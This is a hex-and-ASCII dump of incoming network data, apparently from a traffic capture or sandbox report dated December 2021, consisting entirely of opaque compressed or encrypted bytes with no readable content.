                                                                                              2021-12-13 23:57:19 UTC7869INData Raw: 4e 67 31 5a 44 f4 34 d9 b9 a7 ff c4 75 29 65 aa 1e 92 c2 1b 81 78 66 c0 9f 3e 23 83 2b f9 5b 08 20 6f 77 6c 75 09 92 22 ee 75 30 ea 67 88 4a 4e a4 dd e9 7b f9 12 fc 52 6d 49 2f 3d 64 f6 96 ac a7 fd 98 a1 c1 c3 68 4c 82 ea 45 75 af c3 6b 23 65 10 09 7a 3c da 78 41 d5 a1 9f bc aa e0 cf 42 78 fb 27 91 d2 02 70 6e 21 84 de 4b 01 aa 61 09 8d 48 52 0a fd 78 3f 3b 73 45 92 ed 5d 58 db 84 ee 1b c6 83 ac e8 2d c1 48 91 fe 56 53 f6 43 4d 0d af 44 bb 13 04 b0 7e 02 60 82 b6 3e 12 5f c1 15 0f 83 b2 b1 cd af e0 c7 ab ab e0 13 b8 1d 93 5b 6d 2e 6c a7 af e4 12 3b a2 ad a5 47 ac aa 32 65 2f 61 50 35 e5 74 f4 c8 a7 67 d9 e4 d6 52 9a b0 9a a6 a3 5b 45 f4 9d 41 55 37 16 ad 63 84 05 c6 00 48 e2 56 34 bb 7c 90 1f d3 58 a2 b4 9d fb 5c e5 f5 61 6a de 44 6f f5 07 35 02 8f 9a 64
                                                                                              Data Ascii: Ng1ZD4u)exf>#+[ owlu"u0gJN{RmI/=dhLEuk#ez<xABx'pn!KaHRx?;sE]X-HVSCMD~`>_[m.l;G2e/aP5tgR[EAU7cHV4|X\ajDo5d
                                                                                              2021-12-13 23:57:19 UTC7870INData Raw: f9 7b b2 1e b0 c9 90 ec bb 84 fb 68 4c 70 2b 50 60 e5 11 d6 58 39 c5 e3 97 64 58 91 5f a8 f8 9e d2 36 7c 20 07 5e 40 ab 25 34 6e a6 48 27 dc 32 6d 29 9d 95 8b cb 79 a8 64 2d c5 0d 12 75 d9 a1 ba 1f a1 bd 5d 48 b2 8c 21 06 14 64 de f5 a1 82 cc 9a 25 05 11 51 fc a3 11 51 9b e0 4f f3 58 44 d4 34 f8 9b 09 7f af c2 df 97 05 11 51 01 47 72 23 a8 e7 38 59 4c 8f d3 06 8b e9 9e d7 8f c1 18 57 d9 dd 53 7d 25 a7 5a 51 c7 ce 46 0a 5e a3 f8 69 45 f4 c6 51 5c 25 5c 61 8b 95 92 11 01 7a f2 fa a8 08 ff 1c 02 26 eb 8c d1 6e 66 72 de bc d5 cf 35 d1 c0 77 96 06 54 cd 6a de 6a aa 50 35 6f f5 eb e5 34 78 17 91 f2 d2 d3 14 95 62 9a ce 97 a9 ab a6 35 a9 81 26 e5 95 80 0f a7 3e 71 4a 2b 9b cf aa 29 50 7d 74 aa f2 6a 0a 2c f5 9b 5e 72 a6 15 95 88 a6 d2 7d 25 f1 98 d4 2b 03 9e 7c
                                                                                              Data Ascii: {hLp+P`X9dX_6| ^@%4nH'2m)yd-u]H!d%QQOXD4QGr#8YLWS}%ZQF^iEQ\%\az&nfr5wTjjP5o4xb5&>qJ+)P}tj,^r}%+|
                                                                                              2021-12-13 23:57:19 UTC7886INData Raw: 06 cb 44 25 7c 70 76 36 55 36 a1 76 56 9d 0a 71 69 65 a3 7b 21 34 48 f5 6b 64 6f df c0 ac 80 f4 1a 7b 09 36 06 d1 e8 4c 44 a3 ba 38 c4 e8 ee 74 47 82 46 51 e7 70 bd 4e 45 b0 62 8c 6b b6 ca 36 21 34 a5 96 09 7b 0e 91 8e 40 cf 17 5c b3 9b 11 69 1f 47 9a 76 b9 7a 32 41 6c de f5 3a 71 11 44 54 ea 92 ab 27 0e 68 be 91 45 94 f9 04 22 d3 14 40 a6 b8 61 77 f4 13 a2 d2 53 88 4a ef 47 36 23 35 72 95 5e 2c 77 44 c9 19 15 ce 64 da 63 3b 65 94 8b 08 d4 81 02 19 95 a9 d8 09 cb 41 0c 1a 69 54 66 54 90 70 bf d6 e1 4a 12 0e 28 b4 07 a0 d0 2a 12 de 38 da 11 de c1 54 4c e0 44 fc 69 2f 30 a4 1b dd 99 77 8e 68 3b 62 96 be 2f 1e e3 bb b5 a0 d4 1a 71 6f 65 e0 33 89 90 2d 64 52 c2 8d 88 e6 2f 48 b5 86 9d a6 60 7d d9 69 4a 76 5a 33 52 6d de d8 24 25 f2 1f 3e b0 13 9d 1a b6 91 7b
                                                                                              Data Ascii: D%|pv6U6vVqie{!4Hkdo{6LD8tGFQpNEbk6!4{@\iGvz2Al:qDT'hE"@awSJG6#5r^,wDdc;eAiTfTpJ(*8TLDi/0wh;b/qoe3-dR/H`}iJvZ3Rm$%>{
                                                                                              2021-12-13 23:57:19 UTC7887INData Raw: 15 bb 7a 0b be ee 4b 93 f8 d3 05 e2 a5 4f 23 e4 31 94 ff 86 44 c1 5b 57 db 35 4c fd 74 45 67 7e 53 68 db c5 46 f6 a6 d8 5e 3f 42 0f 40 3a e4 3b 15 98 c6 24 6c 87 4b da 92 ac 2e 08 97 2b b2 6f 36 bc 80 ac e0 d3 43 9b 55 b9 e7 43 19 1d f1 8a c0 3c 09 ef da 21 ca 45 8c 52 1d 49 e8 6c 1a 6d 1e f6 39 e7 1a 86 d7 19 2d 2b 11 de 01 e0 5e 2a 67 8d 74 64 12 77 9a 91 5b 26 ca d6 7b e5 3c 99 49 3b e5 3c 19 c4 38 e7 ac 92 4a 68 8f 9d 6a c6 f5 18 2e f4 79 e7 18 a7 63 11 48 c4 5d e9 52 5f de 1b 51 94 07 ca 9d 34 0e 4c 74 6f e0 ef 8f 6a 96 1d 1a 9b 11 56 85 0b ae 72 94 fd fa 24 38 63 28 f1 a8 0f b7 7b f4 cc e8 4f 3c ee 3a 3c bc 32 fc 89 c7 45 bb 07 23 37 9d 89 e0 4a ac bc dc 54 19 e2 de 80 5f ce a6 4a 17 f7 16 3e 27 d3 bd a1 f1 a2 8a f3 dc e2 77 50 e8 55 53 4c 12 ab 6b
                                                                                              Data Ascii: zKO#1D[W5LtEg~ShF^?B@:;$lK.+o6CUC<!ERIlm9-+^*gtdw[&{<I;<8Jhj.ycH]R_Q4LtojVr$8c({O<:<2E#7JT_J>'wPUSLk
                                                                                              2021-12-13 23:57:19 UTC7903INData Raw: 49 4c 4d 8f 70 cd c4 84 09 13 24 cd f5 58 9c b6 18 aa d0 c6 9d 3a 7f ee 8b e8 d7 13 12 6a e8 0c 1c 9a e1 bd 17 31 fd 35 e9 90 63 78 ef 65 fd 35 30 70 e1 63 7e 7f 0d f6 70 38 32 62 2c 61 16 cf 4d cb 22 7e 30 90 b3 60 74 85 f7 0e 0a 59 34 0d cb 6e 9d 05 d6 b7 f7 b0 45 cc df e4 25 99 01 d3 71 fe c8 e6 9f 14 8c dc 7b d1 7c cd dc 55 74 da 32 cd a2 b4 39 0b 61 3a 2f 58 a2 e9 3d 5f 33 2f 83 59 b2 10 2b b6 64 29 ad 99 b3 1c aa 4a 30 46 73 9b 47 8f 9d 32 52 d3 73 10 b3 2c 6b 10 4c 92 39 8b 06 c1 d8 46 30 25 89 51 03 92 c6 4e 0c 1e e2 98 e3 0b 16 a5 65 8d d4 cc 5b a4 d1 0c d2 47 6b 06 4d 5a 09 66 08 98 b9 43 34 03 a2 1d fd 32 35 6e 8a 2e 32 3a 5e 03 5e d1 f1 93 52 49 06 9a 01 49 c1 9a 01 b1 cb 82 e0 27 06 cc 2a cd 80 25 4b 17 2d 7d 71 69 ab 74 f1 c9 f1 13 23 f5 3a
                                                                                              Data Ascii: ILMp$X:j15cxe50pc~p82b,aM"~0`tY4nE%q{|Ut29a:/X=_3/Y+d)J0FsG2Rs,kL9F0%QNe[GkMZfC425n.2:^^RII'*%K-}qit#:
                                                                                              2021-12-13 23:57:19 UTC7904INData Raw: b7 5f bf fe fd 07 0d 1a 3c 78 c8 90 a1 43 47 8c 08 09 d1 6a c3 c3 47 8d 8a 88 88 8a d2 e9 62 62 c6 8e 1d 37 6e c2 84 49 93 26 4f 9e 32 65 ea d4 a4 a4 69 d3 66 cc 48 49 99 35 6b ce 9c b9 73 e7 cf 7f f1 c5 8c 8c 85 0b 17 2f 5e b2 24 33 73 d9 32 86 59 be 7c d5 aa 97 5f 5e bd 7a ed da 9c 1c 93 c9 6c 5e b7 8e 65 d7 af df b0 e1 8d 37 de 7c f3 ad b7 de 79 e7 fd f7 3f f8 e0 a3 8f 3e fe 78 cb 96 6d db 3e fd 74 c7 8e 2f be d8 b9 73 d7 ae 6f be f9 f6 db dd bb 7f f8 61 ef de 7d fb 0e 1e fc f1 c7 c3 87 8f 1d b3 5a 0b 0b 8f 1f 2f 29 29 2d 3d 79 f2 e7 9f 4f 9f 2e 2f 3f 7f fe e2 c5 4b 97 ae 5c b9 7a f5 fa f5 9b 37 2b 2b ef dc f9 f7 bf ef de ad ae fe ed b7 7b f7 fe f8 e3 c1 83 87 0f 6b 6b eb eb 1b 1a 9e 3e 7d f6 ac a9 49 6a ff 6b b2 ff 75 87 3f 4f f8 ab 84 bf 07 f0 27 6d
                                                                                              Data Ascii: _<xCGjGbb7nI&O2eifHI5ks/^$3s2Y|_^zl^e7|y?>xm>t/soa}Z/))-=yO./?K\z7++{kk>}Ijku?O'm
                                                                                              2021-12-13 23:57:19 UTC7920INData Raw: 74 cd 80 ea b4 00 18 89 06 6a 14 04 e0 ef 0c 30 c3 5c 60 a6 33 40 d5 cf 00 95 4f 03 a6 2c 0c 60 af 13 c5 a2 a4 04 d4 e0 04 50 1d 2d 00 63 bd 00 9a 18 00 94 bd 07 6a fd 06 c0 a5 2f 50 d1 3d 00 2e f9 81 ba 7e 03 90 e5 01 cc e2 0c c4 c0 c0 00 cc f3 3a 80 3e 0e 50 75 77 00 fc 64 81 6a 6f 00 ea fb 13 c0 c5 66 a0 5a 2d a0 aa d5 80 29 ce 64 6c 63 ca 05 55 14 0a 54 a2 06 40 55 2f 0a 42 a1 80 3a 0f 00 53 85 80 59 c1 3f 73 a5 01 ea 16 0a 4c 25 1a 54 33 0d 50 e5 47 00 7a 0f 02 98 29 01 70 e4 0f 54 f6 1a 50 9f 97 c0 4c 56 03 28 7d 0a 20 db 05 54 7b 21 50 d3 a7 a0 ca 4b 00 d4 95 03 68 39 01 cc bb 17 98 63 1a 30 11 16 60 e2 56 00 1e f8 81 3a 0e 03 c8 7d 0f e0 6b 07 80 96 6b c0 ec f7 00 d8 4e 02 b0 eb 0b a0 08 36 f7 72 00 fb fe c0 94 50 00 8e 1c 00 cc 77 ee da 29 0a ab
                                                                                              Data Ascii: tj0\`3@O,`P-cj/P=.~:>PuwdjofZ-)dlcUT@U/B:SY?sL%T3PGz)pTPLV(} T{!PKh9c0`V:}kkN6rPw)
                                                                                              2021-12-13 23:57:19 UTC7921INData Raw: 96 09 0a 00 90 42 05 20 67 0a 98 e6 2e 00 3b 19 c0 7c 21 00 fd 75 40 4d 63 01 3c f4 02 c8 8c 05 d0 60 09 60 60 17 30 8b 11 a0 82 12 00 0a d3 00 24 56 00 78 bd 07 e0 a0 02 a8 b0 1a 50 43 cd 9d 2a 67 2a e9 74 b4 34 80 49 23 a9 24 50 12 a0 69 51 03 10 3e 09 9a 81 2a 00 e1 e6 40 0d cd 00 dc a4 03 98 1c 01 2a 9c 06 4c 6b 37 30 75 75 a0 b2 ed 40 2d db 80 fa ab 01 48 8b 01 4d 05 12 34 35 ed c0 24 d3 01 24 c4 00 78 98 06 26 d3 0f e0 74 32 8b 7b 4f a1 9d c0 6a 57 60 8a 19 a0 99 68 01 f0 39 0d e0 c4 1c 98 87 3a 80 ed 40 00 e1 2d a0 09 6b 07 70 79 0f 34 5f 35 00 da a8 41 53 91 61 41 65 66 01 20 4b 12 34 45 45 a0 a9 f1 07 90 79 0f 98 4b 39 80 70 35 d0 14 4c 01 73 37 03 4d 4d 1b dc b4 b1 1a 83 26 46 59 49 1c c0 89 19 80 d2 f3 a0 59 d1 d8 61 74 ad 06 40 74 2b 80 fd 4a
                                                                                              Data Ascii: B g.;|!u@Mc<```0$VxPC*g*t4I#$PiQ>*@*Lk70uu@-HM45$$x&t2{OjW`h9:@-kpy4_5ASaAef K4EEyK9p5Ls7MM&FYIYat@t+J
                                                                                              2021-12-13 23:57:19 UTC7937INData Raw: 2c 2a 24 34 1e e3 1a 2f 4f 13 9b 64 5a 3b b8 59 a1 39 60 74 7d 70 5a 42 d3 59 d4 f6 45 54 2e f6 f0 b7 2b 34 fa bc 1f 9f e7 21 a3 15 25 18 6d 63 f5 4b d7 ac 1f 0b f7 9c 6d 9b 2c 39 71 f0 55 75 8e 54 4b a5 09 1b fb d7 78 88 14 2e 41 6e e8 0c 16 d3 41 99 2e 61 ab 06 59 ef 0a e4 7c ba ee bc 2d eb 99 07 16 a7 8b 91 6d 73 a0 9d de c6 74 ea 8b 2f db a4 92 eb f3 a9 f4 75 17 3f c4 fd 6c 77 c8 7e c8 68 5f c5 74 f1 cd ae 0b 23 41 87 7a 77 6d b5 3c db 6d fd 39 57 45 d7 e6 f9 74 d4 de a8 62 9d 21 a6 ea 47 0d 0f 7d 36 57 d0 a2 7a ed c9 e9 72 90 f3 cb c6 3a 9f 2a 4b 8b 81 15 be 57 27 f9 1f 8e 89 22 d4 db 9b f8 e4 56 8e e4 19 e3 47 52 a5 46 4a 1f d7 df e3 15 fb ea b6 3d ef 80 32 8b 9c ff e6 a3 4a 6b b7 f6 ac e9 d4 5f 5b 3d ce d5 a2 5c b9 eb d9 87 8d 99 30 86 c2 49 c5 57
                                                                                              Data Ascii: ,*$4/OdZ;Y9`t}pZBYET.+4!%mcKm,9qUuTKx.AnA.aY|-mst/u?lw~h_t#Azwm<m9WEtb!G}6Wzr:*KW'"VGRFJ=2Jk_[=\0IW
                                                                                              2021-12-13 23:57:19 UTC7938INData Raw: d8 cd df 41 07 df ac 46 7d 85 de 34 bd bc f7 42 86 de 8a 7f fb f0 db 9b 92 d0 21 3c 06 a7 3d 73 9a 9b fe a1 76 40 2b 3b 74 54 4e 4d 36 79 f5 c7 ac 3e f5 f5 f7 f8 b7 92 4b ef f1 9d f7 db f4 5f e1 20 68 59 fa 2d 3f 78 12 18 fc 9f 4f 7d 9c 21 4b b1 6e 69 fa a1 a5 fc 83 ef 53 d6 b0 3e 18 6a 39 e5 79 13 da fb f6 e4 fb 03 f2 9b 06 9a 75 86 7d f8 9d 11 47 37 6e d8 24 73 6b fd 67 d5 ee 06 5e 9b 62 a8 ee 6c 97 53 df ef 10 07 ba d7 7b af 5c 11 21 eb 12 43 d2 01 a9 7d d5 bb 17 d2 47 c2 51 53 36 a7 25 6b ef 9d bd f2 44 fc 82 41 f1 0b 06 68 d1 85 60 a5 af 10 62 3c 1e ee 25 6e 65 5e 30 3d b7 43 3a ba 81 8a af c5 8b 23 d7 3e f0 f2 8d 9b f2 bc 49 b3 f7 cc a1 f4 2b b3 62 43 25 9a d7 d9 0f f2 73 59 06 66 96 d2 ef 88 4a a9 da 01 89 e1 3b b9 ec 85 9c 66 47 5c c8 fb 4c 51 a9
                                                                                              Data Ascii: AF}4B!<=sv@+;tTNM6y>K_ hY-?xO}!KniS>j9yu}G7n$skg^blS{\!C}GQS6%kDAh`b<%ne^0=C:#>I+bC%sYfJ;fG\LQ
                                                                                              2021-12-13 23:57:19 UTC7954INData Raw: 67 ad 16 ff 5f e3 ac c5 59 c6 e0 fa dd db a1 a4 1b 1c c4 14 4f f5 d5 c7 06 5f a1 2d b1 ef fc 8c 3d 45 07 80 77 bc 66 6c 14 7f 30 38 ac f2 f2 2d 58 a4 36 3b f3 d5 80 a6 07 83 a4 39 6f d9 db ac 16 c2 b6 e1 d4 80 0d ad 86 89 c6 62 bc 98 56 e3 2c 20 bb 44 e1 e6 16 4f 74 2e 8a 79 7e d0 38 0c 8d 4f b2 ba 5a 49 50 f5 01 01 ea 12 74 fe 20 c0 68 97 d1 60 a4 09 1b d7 5c 9c b0 71 6d dd c2 ca ee 7d 16 bc 51 67 97 64 50 e1 7b da 8d 61 4c d1 54 54 d2 96 65 ea 45 74 13 dc d0 01 d2 08 da 82 b8 ed 80 63 4f dc 1d 6a 1f 6f 8f f3 a6 e3 f4 20 1c 24 a6 2a ab a2 3a 09 48 0a 96 a7 c6 b3 1a 2d c8 6b 7c 9d 14 ad 23 31 de 78 82 e9 5e 90 9e d5 1a 05 50 ea 5d e8 2a 69 97 6a 42 7f 48 70 15 26 25 83 da 7a 9d 81 91 dd e2 2e 8b ec e0 3b 1d b7 fd 5d 54 38 86 eb e0 e2 e2 c2 c4 a9 ab 54 b8
                                                                                              Data Ascii: g_YO_-=Ewfl08-X6;9obV, DOt.y~8OZIPt h`\qm}QgdP{aLTTeEtcOjo $*:H-k|#1x^P]*ijBHp&%z.;]T8T
                                                                                              2021-12-13 23:57:19 UTC7955INData Raw: a0 b9 c1 68 4e cb 86 08 f3 ae 3a dd 11 43 ff ac 5f a5 78 be 06 62 0e 62 8f af 35 c8 66 79 82 2f 34 eb 77 43 ac aa 6d c8 76 42 de b1 6f 7a f5 2d f6 0e 7e ec 0a 1c ad 27 aa bc 6e d0 f7 40 62 f7 f9 f8 b3 ba 9e 3d 83 2c b9 35 3b 96 aa 7a d1 ef ae ad 6e b4 5a ad 4f b1 15 ea 70 b1 c6 af 68 1d 9b b8 52 d5 4f ef e9 97 02 66 4e 4f e9 0b af 83 66 7a 13 bb f3 93 63 30 c3 7c c8 66 da 0e 24 4d ad 83 c7 47 63 76 c3 cd ec 86 ad 9d 69 cb 52 c3 83 5b ba 5d 07 cb 13 33 73 f4 ed 0d b2 33 6f 2d 98 34 c6 13 5f 08 b5 95 a1 97 fb a5 0b f1 75 46 c3 c2 63 83 7d 79 66 ce d9 55 e8 f3 87 f1 f7 d4 8e 99 bc 9e 9f 28 1f d3 79 9e 1b 36 f7 39 4f 96 71 52 57 af d6 97 e3 03 b8 e6 63 db 2b fc 9e fc d9 49 77 3f 47 ee 3b d6 17 2e d5 78 28 a5 5b e0 7c df 8c 34 7a 1f 6f 45 2b 34 e7 92 42 fd 7a
                                                                                              Data Ascii: hN:C_xbb5fy/4wCmvBoz-~'n@b=,5;znZOphROfNOfzc0|f$MGcviR[]3s3o-4_uFc}yfU(y69OqRWc+Iw?G;.x([|4zoE+4Bz
                                                                                              2021-12-13 23:57:19 UTC7971INData Raw: f6 61 36 09 cc f5 36 98 33 12 6f 44 ec 55 10 b3 d8 06 73 af af 3d b8 fd 5f be 19 78 db c4 f3 fc 92 04 31 f7 f9 78 5b eb 60 6e 6e 8d d9 e7 c3 f4 0a cc a5 36 f5 dc ef 6b 4f 8f c0 ac 6c 6c 8d 79 c8 df 9e 5b e1 f9 36 90 c1 66 d1 a7 d2 ff 38 ba 74 1b a7 1d f1 b7 47 60 ce 46 5a 63 8e f9 db 23 30 d7 6f 69 8d a1 fe f6 08 cc 42 1b cc 1e 81 d9 2a b5 e7 6c 87 f6 1c 15 bc 6d 95 da 73 b6 43 7b 1e f3 61 7a 05 a6 5d 7b ee 91 78 73 da 73 b6 43 7b 5e 5d 13 ce 5b 24 da 1a f3 dd 16 98 e5 36 98 c7 ff e9 f5 3d 17 7e 75 cf ba df f9 78 bc 35 12 e5 3c de 11 c4 3a 17 ee 5d 22 c4 0d 6b 70 dc 40 fe a5 3b 45 3f 86 60 7e 23 61 f0 ea 11 98 d8 d6 d6 98 ff 5d e3 ea 10 86 5e 81 59 6c 83 f9 77 1f 66 ad c0 2c b7 c1 7c e6 c7 10 8e c9 dd d5 1a f3 df 2d 30 91 36 98 eb 42 06 5b 57 21 b7 df 4a
                                                                                              Data Ascii: a663oDUs=_x1x[`nn6kOlly[6f8tG`FZc#0oiB*lmsC{az]{xssC{^][$6=~ux5<:]"kp@;E?`~#a]^Ylwf,|-06B[W!J
                                                                                              2021-12-13 23:57:19 UTC7972INData Raw: bc 65 08 2b 5f b0 bc dd e2 5d fc 16 11 cf a5 41 d7 21 d0 74 f7 e5 95 7c f1 84 28 6f 93 28 2f 37 02 76 67 e4 8b 95 f7 86 e4 5f 85 e5 d5 a1 bc 45 08 4b ab e0 cf 6e c6 5c bf 7f c7 fe 2f fc 9e e5 39 df 0f c4 44 79 2b 58 ce 09 90 e1 89 ee ca 5b 10 fe 28 ce e5 7c 87 30 2c ca bb fe 7b 96 87 7e b4 44 f0 8d 57 0e ca 39 0b a1 7e 62 7d 57 fa 3c 2c fc ce 9c eb b8 08 5b 84 0d 0e eb df e1 37 7b a3 4b 10 fc bf 81 46 42 fa d7 f1 6b fd ff 2a cf f9 76 ac 39 3e a0 9d cb 10 56 a4 f6 e6 40 76 b9 91 70 f9 f5 89 77 4b ce e5 7c 03 e5 19 1f c0 1b fd 82 fa bc 24 fc 76 db b5 97 f4 de 14 ad 43 f8 33 34 7a 6d ca f3 d8 e9 ba 52 ab 6b c6 be 62 90 6e e9 33 a1 f4 39 cd d4 cb f8 42 d9 47 17 1e 42 30 7f 5a 54 ad cc d4 4c dd 9e ad d2 7b 07 ac 7b 69 c3 b0 1a f5 7a cd b4 b5 12 18 fb 5c 63 ba
                                                                                              Data Ascii: e+_]A!t|(o(/7vg_EKn\/9Dy+X[(|0,{~DW9~b}W<,[7{KFBk*v9>V@vpwK|$vC34zmRkbn39BGB0ZTL{{iz\c
                                                                                              2021-12-13 23:57:19 UTC7988INData Raw: 0f 7b 55 58 54 d4 9d fc cc 6c 76 2a 5f b0 a6 01 c0 b5 ee ea d1 25 00 39 8d 49 87 ef f1 25 49 62 75 01 f4 6c 10 17 67 f7 8b 1d 67 f7 4b f8 2e 96 55 07 d3 aa 9c a8 8d b0 a7 54 dd 46 f1 b4 e6 ea 6e 45 3c ae 9f 00 0e 76 38 9d 32 f6 dd 24 2f 2e 36 1e 8c c2 90 27 55 59 1e d5 9e 5a 8f 33 59 1c 5c cd 62 31 71 94 84 c3 e9 5b d4 55 f9 3d 52 61 e5 f7 48 85 55 1c da 6c 98 ce 96 e0 e5 6f 26 f7 3a b8 26 33 70 c9 5a aa 3d b6 be 88 69 6e 4c 9c ee 6c c8 cb ac 78 14 4e 65 32 2f 23 df e7 66 5e 07 9f a8 0a 8e 46 5d 68 52 35 61 bd dd c2 79 ce c0 ed 01 a7 e0 a3 0c 5f 53 2e 26 0e 29 a7 e1 98 b3 b2 bd 6f 1a 1d 3d cb fa f1 67 5c 7f 08 5c 0c a4 64 3d 16 5e 8f 87 07 41 2c 1c 96 a4 64 3d 0a 5f aa 21 7c 45 fc e0 09 51 6e 56 94 b1 1c 75 9e 5c ee f8 03 11 8b cf 34 cc 59 92 ba 08 dc b5
                                                                                              Data Ascii: {UXTlv*_%9I%IbulggK.UTFnE<v82$/.6'UYZ3Y\b1q[U=RaHUlo&:&3pZ=inLlxNe2/#f^F]hR5ay_S.&)o=g\\d=^A,d=_!|EQnVu\4Y
                                                                                              2021-12-13 23:57:19 UTC7989INData Raw: 04 ef 20 e5 15 d3 af e3 2e 19 a3 67 24 e6 25 eb 4c d6 76 b7 58 8e dc 95 ae eb 4c f6 2e 40 7d 44 1b f9 db 8f e5 f3 3c f5 6e d9 e6 24 de 98 ac 37 68 bd 47 b6 83 59 db 98 ac 53 6b 86 be d4 a4 eb 67 3c a0 3b 33 8e 66 52 9b 2c ae 2b 04 79 7f c7 91 4c 6a 9b c3 e9 51 db 2e 18 b7 50 72 7f 5b 53 60 e6 f8 cd 54 df 4f ee 9f 54 9b 2e e9 31 dc ac 8d bc 3d 50 77 71 63 b2 1d d3 b8 14 7d 19 de 68 49 b2 63 52 1b 65 3b a6 6d 77 a3 7e eb 71 f2 17 be cf 19 40 e7 22 76 71 e6 b3 62 33 16 9a 7c 38 34 5c 7c ec 4f 92 32 b3 c3 72 5f 8f 13 ac 23 6c 3c ef b5 0b 4d 67 6f 1a 92 75 70 93 18 0d de 96 ac 26 d4 1f 9d 5b 88 b1 ac d7 76 d2 96 8b 8d fb ae 86 64 bd e7 b6 86 64 fd d1 d2 86 e4 73 68 dc 36 65 91 a9 6f a2 1d 52 5d 93 ac 33 ad bb c8 98 f5 13 c6 ec 62 73 98 8f e3 92 ff c7 1c e6 ed
                                                                                              Data Ascii: .g$%LvXL.@}D<n$7hGYSkg<;3fR,+yLjQ.Pr[S`TOT.1=Pwqc}hIcRe;mw~q@"vqb3|84\|O2r_#l<Mgoup&[vddsh6eoR]3bs
                                                                                              2021-12-13 23:57:19 UTC8005INData Raw: 4f c7 ee 12 dc 89 32 7d d2 25 fd 9f f9 57 f1 a1 4b 4a c3 20 8c 80 f4 29 fb e5 69 b4 09 f6 d0 43 4b 98 bb d8 f7 f7 12 b6 7c 36 65 70 16 fd e7 34 ca 80 6b df a9 ac e5 b8 96 be 4d bf 82 21 48 bc 63 bf ee 95 fb 70 8f bf 61 31 3e 09 1e a7 7c f6 f6 49 e9 27 69 cf 8f 8b 36 cc d8 13 0c 48 bd 50 56 1d 90 fa c7 62 86 f4 30 e3 04 eb ff 52 18 80 5e e8 2f 0d d0 ae 03 52 e9 ba 01 49 da 14 b7 eb 04 a4 61 a8 d8 30 20 0d 6e 00 9b 05 a4 81 2d 03 ca f3 8d 11 ae a5 5b 63 b7 6d 40 1a da 0a 8d 6b ef 0e f8 d9 1d ed 38 ea 90 f8 2b 88 33 31 d6 67 4a 6f 13 76 83 d8 35 61 97 d6 ec 06 e8 c3 09 e6 80 32 31 0f 7c 40 1d 7f 48 da a1 ff 23 c2 60 9e 2d bd 11 bd 06 f7 30 00 83 50 36 99 78 60 84 7b 99 eb 40 82 34 cc e3 3a 4f fd b0 b0 49 fc c8 d4 4e f0 3c e3 c2 1c b7 24 cd a5 2f cc a4 5d 4d
                                                                                              Data Ascii: O2}%WKJ )iCK|6ep4kM!Hcpa1>|I'i6HPVb0R^/RIa0 n-[cm@k8+31gJov5a21|@H#`-0P6x`{@4:OIN<$/]M
                                                                                              2021-12-13 23:57:19 UTC8006INData Raw: 3f 59 ab ed ad ed 53 59 17 0f 7f 62 49 ab 78 cf 70 19 f9 6d f0 4a 4d e2 39 ce 6f e4 93 b0 d2 21 35 be 04 fb 5d 79 ef 82 9f 11 f1 bc 33 cc ba af 56 db 37 e0 7f 58 3c ab d9 c7 c7 fe 86 7c 89 f2 23 7d 83 47 99 e7 b8 11 ca 62 b8 86 f4 b2 a7 4c 9f 4c da 29 eb 81 6a ad 3c 37 b5 9f 8b 2b c8 9f f4 08 69 7b 52 8d 5f 3e 80 bd aa 56 d6 c3 a4 b5 0f ff bd 47 93 bf 3a d5 7f 3f 69 1b 24 fc c1 ef fc 4a d9 88 78 94 7f 94 5d 7a 23 dc 52 2e fd 5a 5c c3 fd 6a 38 a5 94 4f d9 25 b4 8b d9 e6 fd 6c e9 49 ec 79 a6 52 7e f7 b1 ff f9 ac 90 ff e1 a0 ea 5f 3e 9f 7a 23 9e b4 68 07 c7 52 1e 94 d7 e0 69 ac 3b 44 1c 94 87 1c d4 f2 49 3a 64 ea b8 37 5f 7f c7 a9 d7 0a fc f5 51 e6 32 e9 90 c5 33 4f ea 6a f0 48 73 99 a5 c9 7b d9 9f 5a 7c 9b fb 94 fe 28 fe 0d f6 19 dc 91 ff e1 bd a8 03 ec fb
                                                                                              Data Ascii: ?YSYbIxpmJM9o!5]y3V7X<|#}GbLL)j<7+i{R_>VG:?i$Jx]z#R.Z\j8O%lIyR~_>z#hRi;DI:d7_Q23OjHs{Z|(
                                                                                              2021-12-13 23:57:19 UTC8022INData Raw: 30 20 87 76 0a f6 fa 8f f2 1f e3 3f d2 7f b4 bf ce 51 ef 68 70 fc e0 9a e3 98 eb 98 e7 98 ef 58 e0 38 25 e6 0f af 19 3e 3b 7c 51 e8 82 d0 b7 be af 7d 9f fb 46 7c a7 05 be f1 7d e6 fb c8 f7 95 ef 13 df a7 be 93 dd 3f 04 4e 71 ef eb 48 04 f6 73 74 78 0f f2 ee ef 58 ec 7d 30 78 80 63 91 37 e5 3d d0 d1 e8 38 5b 5e 33 76 4c ec 3d cf 6b c1 77 3c 33 dc b3 dd 07 07 ef 0a 24 dc fb b8 eb dc f5 ee 26 c7 e5 f2 97 f2 13 f2 42 47 8b a3 d5 f1 b1 2b e9 e8 8f 2d 91 db 1c ed 8e 45 8e 94 e3 20 c7 62 c7 4c ef d5 72 87 a3 d3 71 aa 7b ad e0 9f fe df fc 6b 06 e7 07 f7 0c 05 42 72 60 4e e0 89 e0 77 01 77 c8 19 bb 2a f0 89 ff c3 e0 fe 81 ed 42 db 06 e6 05 77 0e 1d 10 9c 1a ea 09 1e 10 fa 2a 30 e2 df 34 78 63 60 db 60 5b f0 a2 40 63 30 11 aa 0a de 13 dc 23 14 0c 9e 1d f8 22 10 08
                                                                                              Data Ascii: 0 v?QhpX8%>;|Q}F|}?NqHstxX}0xc7=8[^3vL=kw<3$&BG+-E bLrq{kBr`Nww*Bw*04xc``[@c0#"
                                                                                              2021-12-13 23:57:19 UTC8023INData Raw: eb ba c6 d5 e6 cb ba ef 73 34 fb 8e 91 ef 77 24 7d 39 77 8f 7b a9 fb 06 57 ca 37 2f f4 80 c3 13 bb 26 d2 eb 2e 77 f7 bb 2e 8a 1c e9 be d4 75 90 ef 5b 79 bc 77 91 af 37 36 20 37 f9 36 f7 dc 1d dc d4 b3 a6 67 55 e0 3b 77 bf fc a2 bc 95 e7 65 f7 cc c0 4b ee 97 3d 37 07 87 3c ff f1 ec 16 78 d5 13 0d 57 44 de 0a 77 44 f6 0d 87 c3 97 45 be 08 7d 19 fa 3c f4 55 e8 e3 d0 d7 a1 f9 ee f3 7c 2f 3a 86 1c ab 7c cd fe 97 7c 2f 39 d2 ee 97 1d 4b fd 17 fb 7a 83 af 38 5e 75 5c 17 58 e0 7e de f7 9a e3 3f 8e d7 1d 1f ba de 70 bc e9 78 cb f1 b6 e3 1d c7 bb 8e f7 1c 6b b8 c7 b8 63 ee 35 dd 71 f7 b0 63 41 f0 03 c7 